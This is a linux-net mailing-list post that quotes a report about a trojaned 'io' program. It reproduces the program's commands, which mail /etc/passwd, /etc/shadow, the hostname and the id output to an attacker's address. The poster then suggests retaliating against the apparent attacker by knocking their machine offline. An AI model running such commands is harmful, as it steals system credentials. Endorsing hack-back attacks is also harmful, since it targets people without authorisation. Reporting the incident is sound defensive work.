>> 4) The "io" program's purpose was to email my /etc/passwd and
>> /etc/shadow files to an email account ([EMAIL PROTECTED]), along with
>> my hostname, IP address, etc.
>
> Typical.
>
<snip>
>
> Has this been reported to [EMAIL PROTECTED] or
>possibly to [EMAIL PROTECTED]?
>
>> mail -s hhp-pine000 [EMAIL PROTECTED] 2>/dev/null < /etc/passwd
>> echo "`hostname -i` - `id` - `cat /etc/shadow 2>&1`" | mail -s hhp-pine
>> [EMAIL PROTECTED] 2>/dev/null
>
>
Just on a separate but related note, the email address above
picked up in the third message of this thread is of significant
interest to us.
[EMAIL PROTECTED]
In addition I have a whole pile of IP addresses and traced-routes many
related to attglobal.net
We are also receiving a great deal of port scanning and other attention
from these clowns and perhaps its time to put them out of action -
permanently.
The person above I am sure is a Windoze user - he/she hammers port 137
religiously most nights (my time zone!!) which may not be necessarily a
valid
assumption - but its a start. If they are windoze users it shouldn't be too
difficult to knock them over when thay are online.
Regards,
Bruce
-
To unsubscribe from this list: send the line "unsubscribe linux-net" in
the body of a message to [EMAIL PROTECTED]
